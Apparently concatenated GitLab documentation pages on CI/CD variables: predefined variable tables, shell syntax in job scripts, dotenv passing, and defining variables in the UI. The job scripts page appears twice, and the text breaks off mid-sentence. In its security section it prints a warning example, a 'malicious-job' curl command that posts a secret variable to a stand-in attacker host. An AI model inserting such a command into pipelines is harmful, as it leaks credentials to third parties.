| The major version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MAJOR` is `17`. | | `CI_SERVER_VERSION_MINOR` | Pre-pipeline | The minor version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_MINOR` is `2`. | | `CI_SERVER_VERSION_PATCH` | Pre-pipeline | The patch version of the GitLab instance. For example, if the GitLab version is `17.2.1`, the `CI_SERVER_VERSION_PATCH` is `1`. | | `CI_SERVER_VERSION` | Pre-pipeline | The full version of the GitLab instance. | | `CI_SERVER` | Job-only | Available for all jobs executed in CI/CD. `yes` when available. | | `CI_SHARED_ENVIRONMENT` | Pipeline | Only available if the job is executed in a shared environment (something that is persisted across CI/CD invocations, like the `shell` or `ssh` executor). `true` when available. | | `CI_TEMPLATE_REGISTRY_HOST` | Pre-pipeline | The host of the registry used by CI/CD templates. Defaults to `registry.gitlab.com`. Introduced in GitLab 15.3. | | `CI_TRIGGER_SHORT_TOKEN` | Job-only | First 4 characters of the [trigger token](../triggers/_index.md#create-a-pipeline-trigger-token) of the current job. Only available if the pipeline was [triggered with a trigger token](../triggers/_index.md). For example, for a trigger token of `glptt-1234567890abcdefghij`, `CI_TRIGGER_SHORT_TOKEN` would be `1234`. Introduced in GitLab 17.0. <!-- gitleaks:allow --> | | `GITLAB_CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `GITLAB_FEATURES` | Pre-pipeline | The comma-separated list of licensed features available for the GitLab instance and license. | | `GITLAB_USER_EMAIL` | Pipeline | The email of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the email of the user who started the job. | | `GITLAB_USER_ID` | Pipeline | The numeric ID of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the ID of the user who started the job. | | `GITLAB_USER_LOGIN` | Pipeline | The unique username of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the username of the user who started the job. | | `GITLAB_USER_NAME` | Pipeline | The display name (user-defined **Full name** in the profile settings) of the user who started the pipeline, unless the job is a manual job. In manual jobs, the value is the name of the user who started the job. | | `KUBECONFIG` | Pipeline | The path to the `kubeconfig` file with contexts for every shared agent connection. Only available when a [GitLab agent for Kubernetes is authorized to access the project](../../user/clusters/agent/ci_cd_workflow.md#authorize-agent-access). | | `TRIGGER_PAYLOAD` | Pipeline | The webhook payload. Only available when a pipeline is [triggered with a webhook](../triggers/_index.md#access-webhook-payload). | ## Predefined variables for merge request pipelines These variables are available before GitLab creates the pipeline (Pre-pipeline). These variables can be used with [`include:rules`](../yaml/includes.md#use-rules-with-include) and as environment variables in jobs. The pipeline must be a [merge request pipeline](../pipelines/merge_request_pipelines.md), and the merge request must be open. | Variable | Description | |---------------------------------------------|-------------| | `CI_MERGE_REQUEST_APPROVED` | Approval status of the merge request. `true` when [merge request approvals](../../user/project/merge_requests/approvals/_index.md) is available and the merge request has been approved. | | `CI_MERGE_REQUEST_ASSIGNEES` | Comma-separated list of usernames of assignees for the merge request. Only available if the merge request has at least one assignee. | | `CI_MERGE_REQUEST_DIFF_BASE_SHA` | The base SHA of the merge request diff. | | `CI_MERGE_REQUEST_DIFF_ID` | The version of the merge request diff. | | `CI_MERGE_REQUEST_EVENT_TYPE` | The event type of the merge request. Can be `detached`, `merged_result` or `merge_train`. | | `CI_MERGE_REQUEST_DESCRIPTION` | The description of the merge request. If the description is more than 2700 characters long, only the first 2700 characters are stored in the variable. Introduced in GitLab 16.7. | | `CI_MERGE_REQUEST_DESCRIPTION_IS_TRUNCATED` | `true` if `CI_MERGE_REQUEST_DESCRIPTION` is truncated down to 2700 characters because the description of the merge request is too long, otherwise `false`. Introduced in GitLab 16.8. | | `CI_MERGE_REQUEST_ID` | The instance-level ID of the merge request. The ID is unique across all projects on the GitLab instance. | | `CI_MERGE_REQUEST_IID` | The project-level IID (internal ID) of the merge request. This ID is unique for the current project, and is the number used in the merge request URL, page title, and other visible locations. | | `CI_MERGE_REQUEST_LABELS` | Comma-separated label names of the merge request. Only available if the merge request has at least one label. | | `CI_MERGE_REQUEST_MILESTONE` | The milestone title of the merge request. Only available if the merge request has a milestone set. | | `CI_MERGE_REQUEST_PROJECT_ID` | The ID of the project of the merge request. | | `CI_MERGE_REQUEST_PROJECT_PATH` | The path of the project of the merge request. For example `namespace/awesome-project`. | | `CI_MERGE_REQUEST_PROJECT_URL` | The URL of the project of the merge request. For example, `http://192.168.10.15:3000/namespace/awesome-project`. | | `CI_MERGE_REQUEST_REF_PATH` | The ref path of the merge request. For example, `refs/merge-requests/1/head`. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the merge request. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_PROTECTED` | `true` when the source branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_SOURCE_PROJECT_ID` | The ID of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_PATH` | The path of the source project of the merge request. | | `CI_MERGE_REQUEST_SOURCE_PROJECT_URL` | The URL of the source project of the merge request. | | `CI_MERGE_REQUEST_SQUASH_ON_MERGE` | `true` when the [squash on merge](../../user/project/merge_requests/squash_and_merge.md) option is set. Introduced in GitLab 16.4. | | `CI_MERGE_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the merge request. | | `CI_MERGE_REQUEST_TARGET_BRANCH_PROTECTED` | `true` when the target branch of the merge request is [protected](../../user/project/repository/branches/protected.md). Introduced in GitLab 15.2. | | `CI_MERGE_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the merge request. The variable is empty in merge request pipelines. The SHA is present only in [merged results pipelines](../pipelines/merged_results_pipelines.md). | | `CI_MERGE_REQUEST_TITLE` | The title of the merge request. | | `CI_MERGE_REQUEST_DRAFT` | `true` if the merge request is a draft. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/275981) in GitLab 17.10. | ## Predefined variables for external pull request pipelines These variables are only available when: - The pipelines are [external pull requests pipelines](../ci_cd_for_external_repos/_index.md#pipelines-for-external-pull-requests) - The pull request is open. | Variable | Description | |-----------------------------------------------|-------------| | `CI_EXTERNAL_PULL_REQUEST_IID` | Pull request ID from GitHub. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_REPOSITORY` | The source repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_REPOSITORY` | The target repository name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_NAME` | The source branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_SOURCE_BRANCH_SHA` | The HEAD SHA of the source branch of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_NAME` | The target branch name of the pull request. | | `CI_EXTERNAL_PULL_REQUEST_TARGET_BRANCH_SHA` | The HEAD SHA of the target branch of the pull request. | ## Deployment variables Integrations that are responsible for deployment configuration can define their own predefined variables that are set in the build environment. These variables are only defined for [deployment jobs](../environments/_index.md). For example, the [Kubernetes integration](../../user/project/clusters/deploy_to_cluster.md#deployment-variables) defines deployment variables that you can use with the integration. The [documentation for each integration](../../user/project/integrations/_index.md) explains if the integration has any deployment variables available. ## Auto DevOps variables When [Auto DevOps](../../topics/autodevops/_index.md) is enabled, some additional [pre-pipeline](#variable-availability) variables are made available: - `AUTO_DEVOPS_EXPLICITLY_ENABLED`: Has a value of `1` to indicate Auto DevOps is enabled. - `STAGING_ENABLED`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_MODE`: See [Auto DevOps deployment strategy](../../topics/autodevops/requirements.md#auto-devops-deployment-strategy). - `INCREMENTAL_ROLLOUT_ENABLED`: Deprecated. ## Integration variables Some integrations make variables available in jobs. These variables are available as [job-only predefined variables](#variable-availability): - [Harbor](../../user/project/integrations/harbor.md): - `HARBOR_URL` - `HARBOR_HOST` - `HARBOR_OCI` - `HARBOR_PROJECT` - `HARBOR_USERNAME` - `HARBOR_PASSWORD` - [Apple App Store Connect](../../user/project/integrations/apple_app_store.md): - `APP_STORE_CONNECT_API_KEY_ISSUER_ID` - `APP_STORE_CONNECT_API_KEY_KEY_ID` - `APP_STORE_CONNECT_API_KEY_KEY` - `APP_STORE_CONNECT_API_KEY_IS_KEY_CONTENT_BASE64` - [Google Play](../../user/project/integrations/google_play.md): - `SUPPLY_PACKAGE_NAME` - `SUPPLY_JSON_KEY_DATA` - [Diffblue Cover](../../integration/diffblue_cover.md): - `DIFFBLUE_LICENSE_KEY` - `DIFFBLUE_ACCESS_TOKEN_NAME` - `DIFFBLUE_ACCESS_TOKEN` ## Troubleshooting You can [output the values of all variables available for a job](variables_troubleshooting.md#list-all-variables) with a `script` command.
https://docs.gitlab.com/ci/job_scripts
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/job_scripts.md
2025-08-13
doc/ci/variables
[ "doc", "ci", "variables" ]
job_scripts.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Use CI/CD variables in job scripts
Configuration, usage, and security.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} All CI/CD variables are set as environment variables in the job's environment. You can use variables in job scripts with the standard formatting for each environment's shell. To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/). ## With Bash, `sh` and similar To access environment variables in Bash, `sh`, and similar shells, prefix the CI/CD variable with (`$`): ```yaml job_name: script: - echo "$CI_JOB_ID" ``` ## With PowerShell To access variables in a Windows PowerShell environment, including environment variables set by the system, prefix the variable name with `$env:` or `$`: ```yaml job_name: script: - echo $env:CI_JOB_ID - echo $CI_JOB_ID - echo $env:PATH ``` In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) environment variables must be surrounded by quotes to expand properly: ```yaml job_name: script: - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test ``` ## With Windows Batch To access CI/CD variables in Windows Batch, surround the variable with `%`: ```yaml job_name: script: - echo %CI_JOB_ID% ``` You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). Delayed expansion might be needed for variables that contain white spaces or newlines: ```yaml job_name: script: - echo !ERROR_MESSAGE! ``` ## In service containers [Service containers](../docker/using_docker_images.md) can use CI/CD variables, but by default can only access [variables saved in the `.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). Variables [added in the GitLab UI](_index.md#define-a-cicd-variable-in-the-ui) are not available to service containers, because service containers are not trusted by default. To make a UI-defined variable available in a service container, you can re-assign it to another variable in your `.gitlab-ci.yml`: ```yaml variables: SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI ``` The re-assigned variable cannot have the same name as the original variable. Otherwise it does not get expanded. ## Pass an environment variable to another job You can create a new environment variable in a job, and pass it to another job in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline (for example with the [`rules` keyword](../yaml/_index.md#rules)), but they can be used in job scripts. To pass a job-created environment variable to other jobs: 1. In the job script, save the variable as a `.env` file. - The format of the file must be one variable definition per line. - Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`. - Values can be wrapped in quotes, but cannot contain newline characters. 1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv) artifact. 1. Jobs in later stages can then use the variable in scripts, unless [jobs are configured to not receive `dotenv` variables](#control-which-jobs-receive-dotenv-variables). For example: ```yaml build-job: stage: build script: - echo "BUILD_VARIABLE=value_from_build_job" >> build.env artifacts: reports: dotenv: build.env test-job: stage: test script: - echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' ``` Variables from `dotenv` reports [take precedence](_index.md#cicd-variable-precedence) over certain types of new variable definitions such as job defined variables. You can also [pass `dotenv` variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job). ### Control which jobs receive `dotenv` variables You can use the [`dependencies`](../yaml/_index.md#dependencies) or [`needs`](../yaml/_index.md#needs) keywords to control which jobs receive the `dotenv` artifacts. To have no environment variables from a `dotenv` artifact: - Pass an empty `dependencies` or `needs` array. - Pass [`needs:artifacts`](../yaml/_index.md#needsartifacts) as `false`. - Set `needs` to only list jobs that do not have a `dotenv` artifact. For example: ```yaml build-job1: stage: build script: - echo "BUILD_VERSION=v1.0.0" >> build.env artifacts: reports: dotenv: build.env build-job2: stage: build needs: [] script: - echo "This job has no dotenv artifacts" test-job1: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' dependencies: - build-job1 test-job2: stage: test script: - echo "$BUILD_VERSION" # Output is '' dependencies: [] test-job3: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - build-job1 test-job4: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - job: build-job1 artifacts: true test-job5: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - job: build-job1 artifacts: false test-job6: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - build-job2 ``` ## Pass an environment variable from the `script` section to `artifacts` or `cache` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/29391) in GitLab 16.4. {{< /history >}} Use `$GITLAB_ENV` to use environment variables defined in the `script` section in the `artifacts` or `cache` keywords. For example: ```yaml build-job: stage: build script: - echo "ARCH=$(arch)" >> $GITLAB_ENV - touch some-file-$(arch) artifacts: paths: - some-file-$ARCH ``` ## Store multiple values in one variable You cannot create a CI/CD variable that is an array of values, but you can use shell scripting techniques for similar behavior. For example, you can store multiple values separated by a space in a variable, then loop through the values with a script: ```yaml job1: variables: FOLDERS: src test docs script: - | for FOLDER in $FOLDERS do echo "The path is root/${FOLDER}" done ``` ## Use CI/CD variables in other variables You can use variables inside other variables: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' ``` ### As part of a string You can use variables as part of a string. You can surround the variables with curly brackets (`{}`) to help distinguish the variable name from the surrounding text. Without curly brackets, the adjacent text is interpreted as part of the variable name. For example: ```yaml job: variables: FLAGS: '-al' DIR: 'path/to/directory' LS_CMD: 'ls "$FLAGS"' CD_CMD: 'cd "${DIR}_files"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' - 'eval "$CD_CMD"' # Executes 'cd path/to/directory_files' ``` ### Use the `$` character in CI/CD variables If you do not want the `$` character interpreted as the start of another variable, use `$$` instead: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS" $$TMP_DIR' script: - 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR' ``` This does not work when [passing a CI/CD variable to a downstream pipeline](../pipelines/downstream_pipelines_troubleshooting.md#variable-with--character-does-not-get-passed-to-a-downstream-pipeline-properly).
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Use CI/CD variables in job scripts description: Configuration, usage, and security. breadcrumbs: - doc - ci - variables --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} All CI/CD variables are set as environment variables in the job's environment. You can use variables in job scripts with the standard formatting for each environment's shell. To access environment variables, use the syntax for your [runner executor's shell](https://docs.gitlab.com/runner/executors/). ## With Bash, `sh` and similar To access environment variables in Bash, `sh`, and similar shells, prefix the CI/CD variable with (`$`): ```yaml job_name: script: - echo "$CI_JOB_ID" ``` ## With PowerShell To access variables in a Windows PowerShell environment, including environment variables set by the system, prefix the variable name with `$env:` or `$`: ```yaml job_name: script: - echo $env:CI_JOB_ID - echo $CI_JOB_ID - echo $env:PATH ``` In [some cases](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4115#note_157692820) environment variables must be surrounded by quotes to expand properly: ```yaml job_name: script: - D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test ``` ## With Windows Batch To access CI/CD variables in Windows Batch, surround the variable with `%`: ```yaml job_name: script: - echo %CI_JOB_ID% ``` You can also surround the variable with `!` for [delayed expansion](https://ss64.com/nt/delayedexpansion.html). Delayed expansion might be needed for variables that contain white spaces or newlines: ```yaml job_name: script: - echo !ERROR_MESSAGE! ``` ## In service containers [Service containers](../docker/using_docker_images.md) can use CI/CD variables, but by default can only access [variables saved in the `.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). Variables [added in the GitLab UI](_index.md#define-a-cicd-variable-in-the-ui) are not available to service containers, because service containers are not trusted by default. To make a UI-defined variable available in a service container, you can re-assign it to another variable in your `.gitlab-ci.yml`: ```yaml variables: SA_PASSWORD_YAML_FILE: $SA_PASSWORD_UI ``` The re-assigned variable cannot have the same name as the original variable. Otherwise it does not get expanded. ## Pass an environment variable to another job You can create a new environment variable in a job, and pass it to another job in a later stage. These variables cannot be used as CI/CD variables to configure a pipeline (for example with the [`rules` keyword](../yaml/_index.md#rules)), but they can be used in job scripts. To pass a job-created environment variable to other jobs: 1. In the job script, save the variable as a `.env` file. - The format of the file must be one variable definition per line. - Each line must be formatted as: `VARIABLE_NAME=ANY VALUE HERE`. - Values can be wrapped in quotes, but cannot contain newline characters. 1. Save the `.env` file as an [`artifacts:reports:dotenv`](../yaml/artifacts_reports.md#artifactsreportsdotenv) artifact. 1. Jobs in later stages can then use the variable in scripts, unless [jobs are configured to not receive `dotenv` variables](#control-which-jobs-receive-dotenv-variables). For example: ```yaml build-job: stage: build script: - echo "BUILD_VARIABLE=value_from_build_job" >> build.env artifacts: reports: dotenv: build.env test-job: stage: test script: - echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' ``` Variables from `dotenv` reports [take precedence](_index.md#cicd-variable-precedence) over certain types of new variable definitions such as job defined variables. You can also [pass `dotenv` variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job). ### Control which jobs receive `dotenv` variables You can use the [`dependencies`](../yaml/_index.md#dependencies) or [`needs`](../yaml/_index.md#needs) keywords to control which jobs receive the `dotenv` artifacts. To have no environment variables from a `dotenv` artifact: - Pass an empty `dependencies` or `needs` array. - Pass [`needs:artifacts`](../yaml/_index.md#needsartifacts) as `false`. - Set `needs` to only list jobs that do not have a `dotenv` artifact. For example: ```yaml build-job1: stage: build script: - echo "BUILD_VERSION=v1.0.0" >> build.env artifacts: reports: dotenv: build.env build-job2: stage: build needs: [] script: - echo "This job has no dotenv artifacts" test-job1: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' dependencies: - build-job1 test-job2: stage: test script: - echo "$BUILD_VERSION" # Output is '' dependencies: [] test-job3: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - build-job1 test-job4: stage: test script: - echo "$BUILD_VERSION" # Output is: 'v1.0.0' needs: - job: build-job1 artifacts: true test-job5: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - job: build-job1 artifacts: false test-job6: stage: deploy script: - echo "$BUILD_VERSION" # Output is '' needs: - build-job2 ``` ## Pass an environment variable from the `script` section to `artifacts` or `cache` {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/29391) in GitLab 16.4. {{< /history >}} Use `$GITLAB_ENV` to use environment variables defined in the `script` section in the `artifacts` or `cache` keywords. For example: ```yaml build-job: stage: build script: - echo "ARCH=$(arch)" >> $GITLAB_ENV - touch some-file-$(arch) artifacts: paths: - some-file-$ARCH ``` ## Store multiple values in one variable You cannot create a CI/CD variable that is an array of values, but you can use shell scripting techniques for similar behavior. For example, you can store multiple values separated by a space in a variable, then loop through the values with a script: ```yaml job1: variables: FOLDERS: src test docs script: - | for FOLDER in $FOLDERS do echo "The path is root/${FOLDER}" done ``` ## Use CI/CD variables in other variables You can use variables inside other variables: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' ``` ### As part of a string You can use variables as part of a string. You can surround the variables with curly brackets (`{}`) to help distinguish the variable name from the surrounding text. Without curly brackets, the adjacent text is interpreted as part of the variable name. For example: ```yaml job: variables: FLAGS: '-al' DIR: 'path/to/directory' LS_CMD: 'ls "$FLAGS"' CD_CMD: 'cd "${DIR}_files"' script: - 'eval "$LS_CMD"' # Executes 'ls -al' - 'eval "$CD_CMD"' # Executes 'cd path/to/directory_files' ``` ### Use the `$` character in CI/CD variables If you do not want the `$` character interpreted as the start of another variable, use `$$` instead: ```yaml job: variables: FLAGS: '-al' LS_CMD: 'ls "$FLAGS" $$TMP_DIR' script: - 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR' ``` This does not work when [passing a CI/CD variable to a downstream pipeline](../pipelines/downstream_pipelines_troubleshooting.md#variable-with--character-does-not-get-passed-to-a-downstream-pipeline-properly).
https://docs.gitlab.com/ci/variables
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/variables
[ "doc", "ci", "variables" ]
_index.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
GitLab CI/CD variables
Configuration, usage, and security.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} CI/CD variables are a type of environment variable. You can use them to: - Control the behavior of jobs and [pipelines](../pipelines/_index.md). - Store values you want to re-use, for example in [job scripts](job_scripts.md). - Avoid hard-coding values in your `.gitlab-ci.yml` file. You can [override variable values](#cicd-variable-precedence) for a specific pipeline when you [run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually), [run a manual job](../jobs/job_control.md#specify-variables-when-running-manual-jobs), or have them [prefilled in manual pipelines](../pipelines/_index.md#prefill-variables-in-manual-pipelines). Variable names are limited by the [shell the runner uses](https://docs.gitlab.com/runner/shells/) to execute scripts. Each shell has its own set of reserved variable names. To ensure consistent behavior, you should always put variable values in single or double quotes. Variables are internally parsed by the [Psych YAML parser](https://docs.ruby-lang.org/en/master/Psych.html), so quoted and unquoted variables might be parsed differently. For example, `VAR1: 012345` is interpreted as an octal value, so the value becomes `5349`, but `VAR1: "012345"` is parsed as a string with a value of `012345`. For more information about advanced use of GitLab CI/CD, see [7 advanced GitLab CI workflow hacks](https://about.gitlab.com/webcast/7cicd-hacks/) shared by GitLab engineers. ## Predefined CI/CD variables GitLab CI/CD makes a set of [predefined CI/CD variables](predefined_variables.md) available for use in pipeline configuration and job scripts. These variables contain information about the job, pipeline, and other values you might need when the pipeline is triggered or running. You can use predefined CI/CD variables in your `.gitlab-ci.yml` without declaring them first. For example: ```yaml job1: stage: test script: - echo "The job's stage is '$CI_JOB_STAGE'" ``` The script in this example outputs `The job's stage is 'test'`. ## Define a CI/CD variable in the `.gitlab-ci.yml` file To create a CI/CD variable in the `.gitlab-ci.yml` file, define the variable and value with the [`variables`](../yaml/_index.md#variables) keyword. Variables saved in the `.gitlab-ci.yml` file are visible to all users with access to the repository, and should store only non-sensitive project configuration. For example, the URL of a database saved in a `DATABASE_URL` variable. Sensitive variables containing values like secrets or keys should be [added in the UI](#define-a-cicd-variable-in-the-ui). You can define `variables` in: - A job: The variable is only available in that job's `script`, `before_script`, or `after_script` sections, and with some [job keywords](../yaml/_index.md#job-keywords). - The top-level of the `.gitlab-ci.yml` file: The variable is available as a default for all jobs in a pipeline, unless a job defines a variable with the same name. The job's variable takes precedence. In both cases, you cannot use these variables with [global keywords](../yaml/_index.md#global-keywords). For example: ```yaml variables: ALL_JOBS_VAR: "A default variable" job1: variables: JOB1_VAR: "Job 1 variable" script: - echo "Variables are '$ALL_JOBS_VAR' and '$JOB1_VAR'" job2: variables: ALL_JOBS_VAR: "Different value than default" JOB2_VAR: "Job 2 variable" script: - echo "Variables are '$ALL_JOBS_VAR', '$JOB2_VAR', and '$JOB1_VAR'" ``` In this example: - `job1` outputs: `Variables are 'A default variable' and 'Job 1 variable'` - `job2` outputs: `Variables are 'Different value than default', 'Job 2 variable', and ''` Use the [`value` and `description`](../yaml/_index.md#variablesdescription) keywords to define [variables that are prefilled](../pipelines/_index.md#prefill-variables-in-manual-pipelines) for [manually-triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually). ### Skip default variables in a single job If you don't want default variables to be available in a job, set `variables` to `{}`: ```yaml variables: DEFAULT_VAR: "A default variable" job1: variables: {} script: - echo This job does not need any variables ``` ## Define a CI/CD variable in the UI Sensitive variables like tokens or passwords should be stored in the settings in the UI, not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file). Add CI/CD variables in the UI: - For a project [in the project's settings](#for-a-project). - For all projects in a group [in the group's setting](#for-a-group). - For all projects in a GitLab instance [in the instance's settings](#for-an-instance). Alternatively, these variables can be added by using the API: - [With the project-level variables API endpoint](../../api/project_level_variables.md). - [With the group-level variables API endpoint](../../api/group_level_variables.md). - [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md). By default, pipelines from forked projects can't access the CI/CD variables available to the parent project. If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project), all variables become available to the pipeline. ### For a project You can add CI/CD variables to a project's settings. Projects can have a maximum of 8000 CI/CD variables. Prerequisites: - You must be a project member with the Maintainer role. To add or update variables in the project settings: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Environment scope**: Optional. **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). After you create a variable, you can use it in the pipeline configuration or in [job scripts](job_scripts.md). ### For a group You can make a CI/CD variable available to all projects in a group. Groups can have a maximum of 30000 CI/CD variables. Prerequisites: - You must be a group member with the Owner role. To add a group variable: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). The group variables that are available in a project are listed in the project's **Settings > CI/CD > Variables** section. Variables from [subgroups](../../user/group/subgroups/_index.md) are recursively inherited. #### Environment scope {{< details >}} - Tier: Premium, Ultimate {{< /details >}} To set a group CI/CD variable to only be available for certain environments: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. To the right of the variable, select **Edit** ({{< icon name="pencil" >}}). 1. For **Environment scope**, select **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). ### For an instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can make a CI/CD variable available to all projects and groups in a GitLab instance. Prerequisites: - You must have administrator access to the instance. To add an instance variable: 1. On the left sidebar, at the bottom, select **Admin**. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: The value is limited to 10,000 characters, but also bounded by any limits in the runner's operating system. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). ## CI/CD variable security Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third party server. Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: - [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project). - Merge the changes. Review the `.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them. The following example shows malicious code in a `.gitlab-ci.yml` file: ```yaml accidental-leak-job: script: # Password exposed accidentally - echo "This script logs into the DB with $USER $PASSWORD" - db-login $USER $PASSWORD malicious-job: script: # Secret exposed maliciously - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" ``` To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`, all variables containing sensitive information should always be [masked in job 